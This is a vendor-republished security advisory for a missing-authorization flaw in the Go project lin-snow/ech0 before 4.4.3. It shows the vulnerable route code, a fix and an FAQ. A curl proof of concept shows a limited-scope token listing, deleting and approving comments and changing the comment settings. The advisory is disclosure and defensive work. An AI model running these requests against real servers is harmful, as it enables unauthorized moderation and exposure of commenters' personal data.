GHSA-FWG7-53P4-G33C

GHSA-FWG7-53P4-G33C is a medium-severity missing authorization vulnerability in github.com/lin-snow/ech0 (go), affecting versions < 4.4.3. It is fixed in 4.4.3.

Summary

All 9 comment panel admin endpoints (/api/panel/comments/*) are missing RequireScopes() middleware, while every other admin endpoint in the application enforces scope-based authorization on access tokens. An admin-issued access token scoped to minimal permissions (e.g., echo:read only) can perform full comment moderation operations including listing, approving, rejecting, deleting comments, and modifying comment system settings.

Details

The access token scope enforcement system works as follows: JWTAuthMiddleware (internal/middleware/auth.go) parses any valid JWT and injects a viewer into the request context. The RequireScopes() middleware (internal/middleware/scope.go:14) then checks whether the token is an access token and, if so, validates that it carries the required scopes. Session tokens are passed through without scope checks (by design, sessions represent full user authority).

Every admin route group applies RequireScopes() per-handler:

  • internal/router/echo.go, uses RequireScopes(ScopeEchoWrite) / RequireScopes(ScopeEchoRead)
  • internal/router/file.go, uses RequireScopes(ScopeFileRead) / RequireScopes(ScopeFileWrite)
  • internal/router/user.go, uses RequireScopes(ScopeAdminUser) / RequireScopes(ScopeProfileRead)
  • internal/router/setting.go, uses RequireScopes(ScopeAdminSettings) / RequireScopes(ScopeAdminToken)

However, internal/router/comment.go:28-36 registers all 9 panel endpoints directly on AuthRouterGroup without any RequireScopes() call:

// internal/router/comment.go:28-36
appRouterGroup.AuthRouterGroup.GET("/panel/comments", h.CommentHandler.ListPanelComments())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/:id", h.CommentHandler.GetCommentByID())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/status", h.CommentHandler.UpdateCommentStatus())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/hot", h.CommentHandler.UpdateCommentHot())
appRouterGroup.AuthRouterGroup.DELETE("/panel/comments/:id", h.CommentHandler.DeleteComment())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/batch", h.CommentHandler.BatchAction())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/settings", h.CommentHandler.GetCommentSetting())
appRouterGroup.AuthRouterGroup.PUT("/panel/comments/settings", h.CommentHandler.UpdateCommentSetting())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/settings/test-email", h.CommentHandler.TestCommentEmail())

The service layer's requireAdmin() (internal/service/comment/comment.go:719-732) only validates the user's database role (IsAdmin/IsOwner), not the token's scopes:

func (s *CommentService) requireAdmin(ctx context.Context) error {
    v := viewer.MustFromContext(ctx)
    if v == nil || strings.TrimSpace(v.UserID()) == "" {
        return commonModel.NewBizError(...)
    }
    user, err := s.commonService.CommonGetUserByUserId(ctx, v.UserID())
    if err != nil { return err }
    if !user.IsAdmin && !user.IsOwner {
        return commonModel.NewBizError(...)
    }
    return nil
}

The scopes comment:read, comment:write, and comment:moderate are defined in internal/model/auth/scope.go:11-13 and registered as valid scopes, but are never referenced in any RequireScopes() middleware call anywhere in the codebase.

Execution flow: Request with access token (scoped to echo:read only) → JWTAuthMiddleware extracts user ID, sets viewer → No RequireScopes middleware → Handler calls service → requireAdmin() checks user.IsAdmin (true for admin user) → Operation succeeds.

PoC

# 1. As admin, create an access token scoped ONLY to echo:read
curl -X POST https://target/api/settings/access-tokens \
  -H 'Authorization: Bearer <admin-session-token>' \
  -H 'Content-Type: application/json' \
  -d '{"name":"readonly","scopes":["echo:read"],"audience":["public-client"],"expiry_days":30}'
# Save the returned token as $TOKEN

# 2. Verify the token CANNOT access other admin endpoints (scoped correctly):
curl https://target/api/settings \
  -H "Authorization: Bearer $TOKEN"
# Expected: 403 Forbidden (scope check blocks access)

# 3. Use the same limited token to list ALL comments (including pending/rejected):
curl https://target/api/panel/comments \
  -H "Authorization: Bearer $TOKEN"
# Expected: 200 OK with full comment list (bypasses scope enforcement)

# 4. Delete a comment:
curl -X DELETE https://target/api/panel/comments/<comment-id> \
  -H "Authorization: Bearer $TOKEN"
# Expected: 200 OK (should require comment:moderate scope)

# 5. Approve/reject comments:
curl -X PATCH https://target/api/panel/comments/<comment-id>/status \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"status":"approved"}'
# Expected: 200 OK (should require comment:moderate scope)

# 6. Read comment system settings:
curl https://target/api/panel/comments/settings \
  -H "Authorization: Bearer $TOKEN"
# Expected: 200 OK (may expose SMTP configuration)

# 7. Disable the comment system entirely:
curl -X PUT https://target/api/panel/comments/settings \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"enable_comment":false}'
# Expected: 200 OK (should require admin:settings scope)

Impact

  • Principle of least privilege violation: Access tokens designed to limit admin capabilities do not restrict comment panel access. An integration token intended only for reading echoes gains full comment moderation authority.
  • Unauthorized comment moderation: An attacker who compromises a limited-scope access token (e.g., a CI/CD token scoped to echo:read) can approve, reject, delete, and batch-modify all comments.
  • Data exposure: The panel comment listing endpoint returns commenter PII (email addresses, IP hashes, user agents) that should be restricted to tokens with comment:read scope.
  • Settings modification: Comment system settings (including potentially SMTP configuration) can be read and modified, and test emails can be triggered, which could leak mail server credentials.
  • Scope: The attack requires an admin-issued access token, which limits the attack surface (PR:H). However, access tokens are specifically designed for limited-privilege integrations, and this vulnerability negates those limits for the entire comment subsystem.

The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.

GHSA-FWG7-53P4-G33C has a CVSS score of 5.5 (Medium). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.4.3); upgrading removes the vulnerable code path.

Affected versions

github.com/lin-snow/ech0 (< 4.4.3)

Security releases

github.com/lin-snow/ech0 → 4.4.3 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add RequireScopes() middleware to all comment panel routes in internal/router/comment.go:

func setupCommentRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
	// ... captcha and public routes unchanged ...

	// Admin Panel, enforce scopes on access tokens
	appRouterGroup.AuthRouterGroup.GET("/panel/comments",
		middleware.RequireScopes(authModel.ScopeCommentRead),
		h.CommentHandler.ListPanelComments())
	appRouterGroup.AuthRouterGroup.GET("/panel/comments/:id",
		middleware.RequireScopes(authModel.ScopeCommentRead),
		h.CommentHandler.GetCommentByID())
	appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/status",
		middleware.RequireScopes(authModel.ScopeCommentMod),
		h.CommentHandler.UpdateCommentStatus())
	appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/hot",
		middleware.RequireScopes(authModel.ScopeCommentMod),
		h.CommentHandler.UpdateCommentHot())
	appRouterGroup.AuthRouterGroup.DELETE("/panel/comments/:id",
		middleware.RequireScopes(authModel.ScopeCommentMod),
		h.CommentHandler.DeleteComment())
	appRouterGroup.AuthRouterGroup.POST("/panel/comments/batch",
		middleware.RequireScopes(authModel.ScopeCommentMod),
		h.CommentHandler.BatchAction())
	appRouterGroup.AuthRouterGroup.GET("/panel/comments/settings",
		middleware.RequireScopes(authModel.ScopeAdminSettings),
		h.CommentHandler.GetCommentSetting())
	appRouterGroup.AuthRouterGroup.PUT("/panel/comments/settings",
		middleware.RequireScopes(authModel.ScopeAdminSettings),
		h.CommentHandler.UpdateCommentSetting())
	appRouterGroup.AuthRouterGroup.POST("/panel/comments/settings/test-email",
		middleware.RequireScopes(authModel.ScopeAdminSettings),
		h.CommentHandler.TestCommentEmail())
}

Frequently Asked Questions

  1. What is GHSA-FWG7-53P4-G33C? GHSA-FWG7-53P4-G33C is a medium-severity missing authorization vulnerability in github.com/lin-snow/ech0 (go), affecting versions < 4.4.3. It is fixed in 4.4.3. The application does not perform an authorization check before performing a sensitive operation.
  2. How severe is GHSA-FWG7-53P4-G33C? GHSA-FWG7-53P4-G33C has a CVSS score of 5.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/lin-snow/ech0 are affected by GHSA-FWG7-53P4-G33C? github.com/lin-snow/ech0 (go) versions < 4.4.3 is affected.
  4. Is there a fix for GHSA-FWG7-53P4-G33C? Yes. GHSA-FWG7-53P4-G33C is fixed in 4.4.3. Upgrade to this version or later.
  5. Is GHSA-FWG7-53P4-G33C exploitable, and should I be worried? Whether GHSA-FWG7-53P4-G33C is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-FWG7-53P4-G33C is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-FWG7-53P4-G33C? Upgrade github.com/lin-snow/ech0 to 4.4.3 or later.

Other vulnerabilities in github.com/lin-snow/ech0

CVE-2026-35037CVE-2026-33638

Stop the waste.
Protect your environment with Kodem.